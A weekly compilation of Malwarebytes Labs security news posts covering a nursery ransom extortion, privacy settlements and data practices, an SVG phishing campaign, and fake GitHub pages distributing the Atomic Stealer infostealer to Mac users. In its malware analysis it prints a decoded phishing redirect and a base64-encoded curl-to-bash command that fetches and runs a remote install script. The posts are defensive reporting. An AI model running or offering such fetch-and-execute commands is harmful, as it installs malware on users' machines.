A list of topics we covered in the week of September 22 to September 28 of 2025

Last week on Malwarebytes Labs:

*   Hackers threaten parents: Get nursery to pay ransom or we leak your child’s data
*   Google and Flo to pay $56 million after misusing users’ health data
*   Neon App pays users to record their phone calls, sells data for AI training \[updated\]
*   New SVG-based phishing campaign is a recipe for disaster
*   LinkedIn will use your data to train its AI unless you opt out now
*   TikTok is misusing kids’ data, says privacy watchdog
*   Police using drones to read your license plates, warns EFF
*   Malwarebytes for Teams now includes VPN
*   Fake Malwarebytes, LastPass, and others on GitHub serve malware
*   Can you disappear online? (Lock and Code S06E19)
*   American Archive of Public Broadcasting allowed access to restricted media for years
*   Scammers are impersonating the FBI to steal your personal data
*   Beware of Zelle transfer scams
*   ChatGPT solves CAPTCHAs if you tell it they’re fake

Stay safe!

**We don’t just report on scams—we help detect them**

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

 A week in security (September 22 &#8211; September 28) 

Hackers stole data on 8,000 nursery children, then called the children's parents, hoping to increase leverage for their ransom demand.

Just when you think extortionists can’t sink any lower, along comes a lowlife that manages to surprise you.

The BBC reported that a group calling itself “Radiant” claims to have stolen sensitive data related to around 8,000 children from nursery chain Kido, which operates in the UK, US, China, and India.

The data the group says it stole includes names, photos, addresses, dates of birth, and details about their parents or carers. The hack also reportedly exposed safeguarding notes and medical information.

To prove their possession of the data, the criminals posted samples, including pictures and profiles of ten children on their darknet website. They then issued a ransom demand to Kido, threatening to release more sensitive data unless they were paid.

When contacted by the BBC about their extortion attempt, the group defended their actions, claiming to:

> “… deserve some compensation for our pentest.”

They should educate themselves before continuing. In most jurisdictions, to carry out this type of “penetration testing” legally, they need to get explicit permission from the company first (or choose a company that runs a bug bounty program).

As if stealing children’s data and publishing them on the dark web isn’t bad enough, Joe Tidy at the BBC reported that the group also called some of the children’s parents—telling them to put pressure on the nursery chain to pay the ransom demand, or they’ll leak their child’s data.

If history has taught us anything, the next step is that they will try to extort the parents individually, as happened in the case of the Finnish psychotherapy practice Vastaamo. Trust me, these things never end well. In Vastaamo’s case, the clinic went bankrupt, at least one suicide has been linked to the case, and the attackers have been sentenced to jail time.

Kido has not issued a public statement. Although the investigation is ongoing, it has contacted parents to confirm the incident and offer reassurance.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice it offers.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication **(****2FA)**.** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of 2FA can be phished just as easily as a password, but 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the company’s website to see if it’s contacting victims and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring**, which alerts you if your personal information is found being traded illegally online and helps you recover after.

**We don’t just report on data privacy—we help you remove your personal information**

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

 Hackers threaten parents: Get nursery to pay ransom or we leak your child&#8217;s data 

Flo Health and Google agreed to pay $56 million to settle lawsuits alleging the period-tracking app shared sensitive health data for ads.

Popular period-tracking app Flo Health shared users’ intimate health data—such as menstrual cycles and fertility information—with Google and Meta, allegedly for targeted advertising purposes, according to multiple class-action lawsuits filed in the US and Canada.

Between 2016 and 2019, the developers of Flo Health shared intimate user data with companies including Facebook and Google, mobile marketing firm AppsFlyer, and Yahoo!-owned mobile analytics platform Flurry. 

Google and Flo Health reached settlements with plaintiffs in July, just before the case went to trial. The terms, disclosed this week in San Francisco federal court, stipulate that Google will pay $48 million and Flo Health will pay $8 million to compensate users who entered information about menstruation or pregnancy between November 2016 and February 2019.

In an earlier trial, co-defendant Meta was found liable for violating the California Invasion of Privacy Act by collecting the information of Flo app users without their consent. Meta is expected to appeal the verdict.

The FTC investigated Flo Health and concluded in 2021 that the company misled users about its data privacy practices. This led to a class-action lawsuit which also involved the now-defunct analytics company Flurry, which settled separately for $3.5 million in March.

Flo and Google denied the allegations despite agreeing to pay settlements. Big tech companies have increasingly chosen to settle class action lawsuits while explicitly denying any wrongdoing or legal liability—a common trend in high-profile privacy, antitrust, and data breach cases.

It depicts a worrying trend where big tech pays off victims of privacy violations and other infractions. High-profile class-action lawsuits against, for example, Google, Meta, and Amazon, grab headlines for holding tech giants accountable. But the only significant winners are often the lawyers, leaving victims to submit personal details yet again in exchange for, at best, a token payout.

By settling, companies can keep a grip on the potential damages and avoid the unpredictability of a jury verdict, which in large classes could reach into billions. Moreover, settlements often resolve legal uncertainty for these corporations without setting a legal precedent that could be used against them in future litigation or regulatory actions.

Looking at it from a cynical perspective, these companies treat such settlements as just another operational expense and continue with their usual practices.

In the long run, such agreements may undermine public trust and accountability, as affected consumers receive minimal compensation but never see a clear acknowledgment of harm or misconduct.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

 Google and Flo to pay $56 million after misusing users&#8217; health data 

An app called Neon Mobile which pays a small price for privacy is storming the popularity chart in the US Apple app store.

TechCrunch reports about a “bizarre app” inviting you to record and share your audio calls so that it can sell the data to AI companies. And if that’s not weird enough on its own, it’s ranking No. 2 in Apple’s US app store at the time of writing.

The name of the app is Neon Mobile and it promises to pay users hundreds or even thousands of dollars per year. Why would you do it? Its reasoning is the old “they already know everything about you anyway” adage and “you might as well get paid for it then.”

Neon will sell the data collected by the app to “AI companies for the purpose of developing, training, testing, and improving machine learning models, artificial intelligence tools and systems, and related technologies.”

The payment is $0.15 per minute if you’re the only Neon Mobile user in the conversation, and this doubles when the person on the other end uses the app as well. With a maximum payout of $30 per day and the understanding that the call has to be made through the app, you’ll have to be on the phone a lot to make thousands of dollars, but we can see why this might be an attractive offer to some people.

Some people are even already planning to do it as a second job. One commenter says:

> “They just want the voice data. So if you and a friend agree to talk about pretend situations for an hour a day to make $900 a month that seems pretty easy. If both parties are doing it that comes out to $18 an hour which is pretty good.”

Neon Mobile promises that:

*   It will never sell your personal data to any third party.
*   It does not knowingly or intentionally collect personal data about children under 16.
*   It will only record your side of the call unless it’s with another Neon user.

We have some doubts about how it will accomplish the one-sided recording technically, as well automatically filtering out names, numbers, and other personal details.

As always, there are some caveats. Looking at the Privacy Policy we noticed:

*   **Neon collects a lot of personal and technical data about you**, like identifiers, contact details, usage data, payment information, event participation, account activity, testimonials, and other data from third-party sources.
*   **Any third-party integrations are your responsibility**. These third-party integrations may ask for permissions to access your personal data, or send information to your Neon Account. It is the user’s responsibility to review any third-party integrations.
*   **Your personal data is shared with others.** Neon regularly passes personal data to service providers and “trusted partners” for things like hosting, marketing, sales support, and analytics. combined marketing, support, and analytics.
*   **You have certain rights, but not absolute ones.** You can request to access, delete, or correct the personal data Neon Mobile collects or maintains about you, but Neon may deny requests when the law allows.
*   **You need to watch out for opt-outs.** If Neon wants to use your data in a new way, or if it plans to disclose it to another third party not already covered in the Privacy Policy, it will give you the choice to refuse this new use or disclosure. But this an “opt out” opportunity, so you will have to pay close attention to every change in the Terms of service and the Privacy Policy.
*   **The disclosure rights are quite broad.** Neon reserves the right to disclose data to comply with legal obligations, protect rights and safety, investigate fraud, or respond to law enforcement requests, with broad latitude for “compelled disclosure”.

In other words, Neon gathers and combines a wide range of personal and usage data, shares it with partners and third parties, and reserves broad rights to repurpose or disclose it—leaving users to monitor policy changes and opt out if they don’t agree.

Given the breadth of the data collection and the numerous caveats (while framed as protections against abuse), I’d argue that Neon Mobile is paying a low price for users’ privacy.

It’s also worth noting that if you become disappointed with the app or its returns, it takes more than just deleting the app from your device .

> “If you delete the Neon app (but do not close your Neon account), your calls can still be recorded when other Neon users who have the app call you. If you want to stop call recordings with other Neon users, close your account through your profile settings.”

I’d also advise anyone using the app to inform the person on the other end that the conversation will be recorded, since failing to do so may have legal implications.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

 Neon App pays users to record their phone calls, sells data for AI training 

Another phishing campaign using SVG files to trick targets. This delicious-looking recipe turns out to hide malicious code.

We’ve written in the past about cybercriminals using SVG files for phishing and for clickjack campaigns. We found a new, rather sophisticated example of an SVG involved in phishing.

For readers that missed the earlier posts, SVG files are not always simply image files. Because they are written in XML (eXtensible Markup Language), they can contain HTML and JavaScript code, which cybercriminals can exploit for malicious purposes.

Another advantage for phishers is that, on a Windows computer, SVG files get opened by Microsoft Edge, regardless of what your default browser is. Since most people prefer to use a different browser, such as Chrome, Edge can often be overlooked when it comes to adding protection like ad-blockers and web filters.

The malicious SVG we’ve found uses a rather unusual method to send targets to a phishing site.

Inside RECElPT.SVG we found a script containing a lot of food/recipe-related names (“menuIngredients”, “bakingRound”, “saladBowl”, etc.), which are all simply creative disguises for obfuscating the code’s malicious intentions.

This is the part of the code where the phishers hid a redirect:

Upon close inspection, the illusion of an edible recipe quickly disappears. 141 cups of eggs, anyone?

But picking the code apart, we noticed that the decoder works like this:

1.  Search for data-ingredients=”…” in the given text.
2.  Split the string inside the attribute by commas to get a list. E.g., 219cups\_flour, 205tbsp\_eggs,…
3.  For each element, extract the leading numeric value (e.g., 219 from 219cups\_flour).
4.  Subtract 100 from this value.
5.  If the result is an ASCII printable character (ranging from 32–126), then convert it to the character with that number.
6.  Join all characters together to form the final decoded string.

Using this method we arrived at window.location.replace("https://outuer.devconptytld[.]com.au/");

window.location.replace is a JavaScript method that replaces the current resource with the one at the provided URL. In other words, it redirects the target to that location if they open the SVG file.

When redirected, the user will see this prompt, which is basically intended to hide the real location of the server behind Cloudflare services, but also provides some sense of legitimacy for the visitor.

It doesn’t matter what the user does here, they will get forwarded again with the code passing the e parameter (the target’s email address) on to the next destination.

But this is where our adventure ended. For us, the next site was an empty one.

We couldn’t determine what conditions had to be met to get to the next stage of the phishing expedition. But it is highly likely it will display a fake login form (almost certainly Microsoft 365- or Outlook-themed), to capture the target’s username and password.

Microsoft flagged a similar campaign which was clearly obfuscated with AI assistance and appeared even more legitimate at first glance.

Some remarks we want to share about this campaign:

*   We found several versions of the SVG file dating back to August 26, 2025.
*   The attacks are very targeted with the target’s email address embedded in the SVG file.
*   The phishing domain could be a typosquat for the legitimate devconptyltd.com.au, so it could mean the targets were doing business with Devcon Pty Ltd who owns that domain. This is a tactic we often see in Business Email Compromise (BEC) attacks.
*   We found several subdomains of devconptytld\[.\]com.au associated with this campaign. The domain’s TLS certificate dates back to August 24, 2025 and is valid for 3 months.

**How to stay safe from SVG phishing attacks**

SVG files are an uncommon attachment to receive, so it’s good to keep in mind that:

*   They are not always “just” image files.
*   Several phishing and malware campaigns use SVG files, so they deserve the same treatment as any other attachment: don’t open until the trusted sender confirms sending you one.
*   Always check the address of a website asking for credentials. Or use a password manager, they will not auto-fill your details on a fake website.
*   Use real-time anti-malware protection, preferably with a web protection component. Malwarebytes blocks the domains associated with this campaign.
*   Use an email security solution that can detect and quarantine suspicious attachments.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 New SVG-based phishing campaign is a recipe for disaster 

LinkedIn will not be asking for your permission to share your data for AI training. Here's how to opt out before the deadline.

LinkedIn plans to share user data with Microsoft and its affiliates for AI training. Framed as “legitimate interest”, it won’t ask for your permission—instead you’ll have to opt out before the deadline.

Microsoft has made major investments in ChatGPT’s creator OpenAI, and as we know, the more data we feed a Large Language Model (LLM) the more useful answers the AI chatbot can provide. This explains why LinkedIn wants your data, but not how it went about it.

The use of personal data for AI improvements and product personalization always raises privacy concerns and we would expect a much lower participation rate if users had to sign up for it. The problem in this case is that you were already opted-in by default and your data will be used up to the point where you opt out.

To opt out, you should go to your LinkedIn privacy settings:

*   Navigate to Settings & Privacy > Data privacy > Data for Generative AI Improvement.  
    

*   Toggle off Use my data for training content creation AI models.  
    

*   Optionally, file a Data Processing Objection request to formally object. To do this, access the Data Processing Objection Form, select **Object to processing for training content-generating AI models**, and send a request. Non-members can also file an objection if their personal data was shared on LinkedIn by a member.

You should also review and clean up older or sensitive posts, profiles, or resumes to reduce exposure. Again, opting out only stops future training on new data; it does not retract data already used.

The data LinkedIn might share is pretty extensive:

*   **Profile data**, which includes your name, photo, current position, past work experience, education, location, skills, publications, patents, endorsements, and recommendations.
*   **Job-related data**, such as resumes, responses to screening questions, and application details.
*   **The content you posted**, such as posts, articles, poll responses, contributions, and comments.
*   **Feedback**, including ratings and responses you provide.

**Who is affected and how?**

There are some contradicting statements going around about in which countries the new update to LinkedIn terms will apply. The official statement says members in the EU, EEA, Switzerland, Canada, and Hong Kong have until November 3, 2025, to opt out. (EEA is the EU plus Iceland, Liechtenstein, and Norway). Other sources say that UK users are affected as well. We’d advise anyone who has that setting and doesn’t want to participate to turn the “Use my data…” setting off.

Reportedly, a quarter of the over 1 billion LinkedIn users are in the US, so they can provide a lot of valuable data. In the terms update, users in the US are included in the part where it says:

> “Starting November 3, 2025, we will share additional data about members in your region with our Affiliate Microsoft so that the Microsoft family of companies can show you more personalized and relevant ads. This data may include your LinkedIn profile data, feed activity data, and ad engagement data; it does not include any data that your settings you do not allow LinkedIn to use for ad purposes.”

You can review those settings and act as you prefer your data to be handled.

**We don’t just report on threats – we help safeguard your entire digital identity**

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 LinkedIn will use your data to train its AI unless you opt out now 

TikTok is scooping up data on hundreds of thousands of children who shouldn't have been on the platform, according to Canadian privacy commissioners.

A group of privacy commissioners in Canada have accused TikTok of scooping up information about hundreds of thousands of children who shouldn’t have been on the platform.

The Chinese social media giant is also accused of collecting data on Canadian users without properly explaining what it does with that information, the watchdogs added.

In a report issued last week, the Federal Privacy Commissioner, along with commissioners in British Columbia, Québec and Alberta, accused the service of failing to keep children under 13 off its platform. The service’s terms and conditions prohibit people under that age from using TikTok. From the report:

> “The tools implemented by TikTok to keep children off its platform were largely ineffective. This was particularly true in respect of the majority of users who are ‘lurkers’ or ‘passive users’, who view videos on the platform without posting video or text content.”

**Inadequate age gates and inappropriate data collection**

TikTok relied on a voluntary age gate to keep very young users off the platform. That system simply trusts a person to correctly enter their birth date, the report found.

It used stronger protection to stop those under 18 from using its TikTok LIVE live-streaming function, in the form of facial analytics. However when it did use facial analysis, the company didn’t explain to users that it would use that information to determine their age and gender for ads and content recommendations, the privacy commissioners added.

TikTok collects significant data on its users, explained the report. This includes their demographics, interests, and location. A demonstration of its advertising portal even highlighted the possibility of targeting people with ads based on their transgender status. The report said:

> “TikTok claimed that this was not supposed to be possible but was unable to explain how or why this option had been available.”

The company also failed to adequately explain to young users about how it would use their data. It used the same messaging that it gave to adults, said the privacy commissioners, who added that even that messaging was inadequate. The report added,

> “The investigation uncovered that TikTok removes approximately 500,000 underage users from the platform each year. Where these children were engaging with the platform before being removed, TikTok was already collecting, inferring and using information about them to serve them targeted ads and recommend tailored content to them.”

**What TikTok has agreed to do**

TikTok has disagreed with the commissioners’ findings, but will nevertheless build three new age assurance systems into its service that will be better at keeping underage users off the platform. It will also make its privacy policy clearer about how it targets advertising and recommends content, and how it uses biometric data, and it will publish a plain-language policy for teens.

Finally it will put a ‘Privacy Settings Checkup’ system in place, making it easier for Canadians to review and set their privacy choices.

This isn’t the first time that Canada’s government has clashed with TikTok. It had already ordered TikTok Technology Canada to wind down operations last November based on concerns about the national security of its owner ByteDance operating on Canadian soil. This didn’t affect people’s ability to use the software in Canada, though. The move prompted TikTok to challenge the order in federal court.

South of the border, a group of investors including Oracle chair Larry Ellison, Dell Technologies chair Michael Dell, and Rupert and Lachlan Murdoch are negotiating the acquisition of TikTok’s US operation. A successful bid would see the US data stored in Oracle’s Cloud system.

**We don’t just report on data privacy—we help you remove your personal information**

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

 TikTok is misusing kids&#8217; data, says privacy watchdog 

Police forces are increasingly using drones, but should they be able to read license plates?

Police are using drones as flying automated license plate readers (ALPRs), according to a report by the Electronic Frontier Foundation (EFF).

And where there is a market, a provider will jump in. Or was it the other way around this time? Flock Safety, for example, recently told a group of potential law enforcement customers interested in Drone as First Responder (DFR) programs that its drone can be used as a flying license plate reader camera as well.

An ALPR system is an intelligent surveillance system that automatically identifies and documents license plates of vehicles by using optical character recognition. This is not necessary for the drones’ main task—it’s an extra feature.

We can definitely see the benefits of the DFR program, which tell police officers what to expect before they arrive at the scene. Increasing situational awareness by using drones makes it safer for both law enforcement officers and the public.

The problem is that drones equipped with ALPR technology can systematically record vehicle location and movement, indifferent to whether it’s in public or private spaces. Unlike fixed cameras, drones can reach places and angles otherwise inaccessible, so they can look in backyards, private driveways, and even through windows.

Depending on the local circumstances, police DFR programs involve a fleet of drones, which can range in number from a few to a few hundred. Low operational costs enable police and their drones to collect and store enormous amounts of data. These practices increase the risk of breaches or leaks. Agencies often keep ALPR and drone-captured data well beyond its useful period, store it on centralized or external servers, and regularly share it with other agencies or federal authorities, according to the EFF.

According to EFF’s Atlas of Surveillance there are approximately 1,500 police departments known to have a drone program. A recent Wired investigation raised concerns about one police department’s program, finding that roughly one in 10 drone flights lacked a stated purpose and for hundreds of deployment the reason was listed as “unknown.”

There is a thin line between unwarranted surveillance and accidental recordings. The EFF states:

> “While some states do require a warrant to use a drone to violate the privacy of a person’s airspace, Alaska, California, Hawaii, and Vermont are currently the only states where courts have held that warrantless aerial surveillance violates residents’ constitutional protections against unreasonable search and seizure absent specific exceptions.”

Combined with Artificial Intelligence (AI)—and these are already operational—drones can become a force to be reckoned with. But we need to start thinking about regulations to limit the privacy implications, so we don’t end up in a surveillance-state society.

Flock has previously described its desire to connect ALPR scans to additional information on the person who owns the car, meaning that we don’t live far from a time when police may see your vehicle drive by and quickly learn that it’s your car and a host of other details about you.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

 Police using drones to read your license plates, warns EFF 

Malwarebytes for Teams now includes personal VPN to encrypt your traffic and broaden your access across the web.

Running a small business today can hardly be done from a single device, a single location, or a single network.

Staying cybersecure is quite the same.

To extend the security and privacy of small business owners, no matter where you are, Malwarebytes for Teams now includes personal VPN access, for no additional cost, for all registered devices. Whether you’re typing up a draft on your tablet at a café, answering urgent emails from your smartphone at the airport, or just protecting your browsing activity on your laptop, connecting to a personal VPN provides that extra comfort that what you’re doing online is your business and your business only.

With a personal VPN you can:

*   Guard your online activity from prying eyes, whether on your laptop, smartphone, or tablet.
*   Access information, content, and resources that are typically restricted by location.
*   Maintain high speed connections for everything you do.

VPNs (Virtual Private Networks) have a bit of a dual reputation right now: They’re either IT tools that help multinational enterprises connect to corporate networks, or they’re covert programs that help paranoid privacy hawks slip by undetected online. The truth is that VPNs are for everyone, and that’s because what they offer is a benefit to all.

VPNs encrypt and protect your online traffic so that eavesdroppers can’t spy on your browsing behavior. This is useful both at public locations and in your office or home, because not all cyber snoops are hackers or criminals. In fact, some of the most active eavesdroppers are Internet Service Providers themselves, that sell consumer data for profit.

VPNs also provide a simple way to connect to an increasingly segmented internet. Despite the name, “the world wide web” can appear quite different when you travel to another country. The streaming platforms you enjoy at home can be blocked, their digital libraries can differ, and entirely benign resources can be gated behind separate laws. By connecting to any variety of servers through a VPN, you can access the internet you know and rely on, no matter your physical location.

It’s important to remember, however, that a VPN is just one part of a larger cybersecurity strategy. You still need to protect your small business’s devices from malware infections, rogue viruses, shady websites, and online scams.

For those threats, Malwarebytes for Teams also keeps you safe, especially when you’re mobile.  

Malwarebytes Scam Guard is available on iOS and Android

Malwarebytes Browser Guard is a free browser add-on that stops invasive ad trackers and flags dangerous websites connected to cybercriminal networks that are cleverly disguised to steal your information or infect your device. And for every other type of concerning message, email, link, or QR code, Malwarebytes Scam Guard for iOS and Android provides 24/7, AI-powered evaluations on who to trust, where to click, and what to ignore.

As every small business is unique, every security plan must adapt. Malwarebytes for Teams is proud to offer the security and privacy options that keep a modern mobile business safe online from hackers, scammers, and digital snoops.

 Malwarebytes for Teams now includes VPN 

Fake software—including Malwarebytes and LastPass—is currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.

Fake versions of legitimate software are currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.

Unfortunately, Malwarebytes for Mac is one of them.

Impersonating brands is sadly commonplace, as scammers take advantage of established brand names to target their victims. So this is nothing new, but we always want to warn you about it when we see it happening.

In this case, the cybercriminals’ goal is to distribute information stealers. They figured out a while ago that the easiest way to infect Macs is to get users to install the malware themselves, and the Atomic Stealer (aka AMOS) is the go-to information stealer for Macs.

The LastPass Threat Intelligence team has posted information about the campaign, which follows a similar pattern for all the impersonated software. Sometimes, the starting point is a sponsored Google ad (did we mention we don’t like them? Oh yes, we did!) that points to GitHub instead of the official page of the developer.

But in other, less obvious cases, you may see search results like these:

These only came up at the top of the search results when I explicitly searched for “Malwarebytes Github MacOS”, but the cybercriminals are known to have used Search Engine Optimization (SEO) techniques to get their listings higher in the search results.

The idea is to get the aspiring user to click on the “GET MALWAREBYTES” button on the dedicated GitHub page.

If someone does click that button, they will end up on a download page with instructions on how to install the fake product, which is actually an information stealer.

The terminal installation instructions for Malwarebytes for Mac pointed to a recently registered domain, but thankfully our Browser Guard blocked it anyway.

Here’s a technical breakdown of the instructions provided to the visitor:

*   /bin/bash -c "<something>" runs a command using the Bash shell on macOS or Linux. Bash is the interpreter for shell commands.
*   The part in quotes uses $( ... ). Everything inside this gets executed first; its output becomes part of the outer command.
*   $(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d) echo ... | base64 -d decodes the long string.
*   curl -fsSL is a command to download data from the web. The options mean:
    
    *   \-f: Fail silently for HTTP errors.-s: Silent mode (no progress bar).-S: Show errors if -s is used.
    
    *   \-L: Follow redirects.

So, putting all this together:

The inner command turns into: curl -fsSL https://gosreestr[.]com/hun/install.sh

The outer command becomes: /bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"

So, the complete command tells the system to download a script directly from an external server and immediately execute it using Bash.

This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use of the command line, it can bypass normal file download protections and execute anything the attacker wants.

The files to download have already been taken down, but users that recognize this chain of infection are under advice to thoroughly check their machines for an infection.

Impersonated software besides Malwarebytes and LastPass included:

*   1Password
*   ActiveCampaign
*   After Effects
*   Audacity
*   Auphonic
*   Basecamp
*   BetterSnapTool
*   Biteable
*   Bitpanda
*   Bitsgap
*   Blog2Social
*   Blue Wallet
*   Bonkbot
*   Carbon Copy Cloner
*   Charles Schwab
*   Citibank
*   CMC Markets
*   Confluence
*   Coolors
*   DaVinci Resolve
*   DefiLlama
*   Desktop Clockology
*   Desygner
*   Docker
*   Dropbox
*   E-TRADE
*   EigenLayer
*   Fidelity
*   Fliki
*   Freqtrade Bot
*   Freshworks
*   Gemini
*   GMGN AI
*   Gunbot
*   Hemingway Editor
*   HeyGen
*   Hootsuite
*   HTX
*   Hypertracker
*   IRS
*   KeyBank
*   Lightstream
*   Loopback
*   Maestro Bot
*   Melon
*   Metatrader 5
*   Metricool
*   Mixpanel
*   Mp3tag
*   Mural
*   NFT Creator
*   NotchNook
*   Notion
*   Obsidian
*   Onlypult
*   Pendle Finance
*   Pepperstone
*   Pipedrive
*   Plus500
*   Privnote
*   ProWritingAid
*   Publer
*   Raycast
*   Reaper
*   RecurPost
*   Renderforest
*   Rippling
*   Riverside.fm
*   Robinhood
*   Rug AI
*   Sage Intacct
*   Salesloft
*   SentinelOne
*   Shippo
*   Shopify
*   SocialPilot
*   Soundtrap
*   StreamYard
*   SurferSEO
*   Thunderbird
*   TweetDeck
*   Uphold
*   Veeva CRM
*   Viraltag
*   VSCO
*   Vyond
*   Webull
*   Xai Games
*   XSplit
*   Zealy
*   Zencastr
*   Zenefits
*   Zotero

But it’s highly likely that there will be more, so don’t see this as an exhaustive list.

**How to stay safe**

Both ThreatDown and Malwarebytes for Mac detect and block this Atomic Stealer variant and many others, but it’s better to not download it at all. There are a few golden guidelines on how to stay safe:

*   Never run copy-pasted commands from random pages or forums even if they are on seemingly legitimate GitHub pages, and especially don’t use any that involve curl … | bash or similar combos.
*   Always download software from the official developer pages. If they do not host it themselves, verify the download links with them.
*   Avoid sponsored search results. At best they cost the company you looked for money and at worst you fall prey to imposters.
*   Use real-time anti-malware protection, preferably one that includes a web protection component.

If you have scanned your Mac and found the information stealer:

*   Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
*   If any signs of persistent backdoor or unusual activity remain, strongly consider a **full clean reinstall of macOS** to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
*   After reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.
*   Change all the passwords that were stored on the affected system and enable multi-factor authentication for your important accounts.
*   If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team are happy to assist you if you have any concerns.

**We don’t just report on threats – we help safeguard your entire digital identity**

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Source

Malwarebytes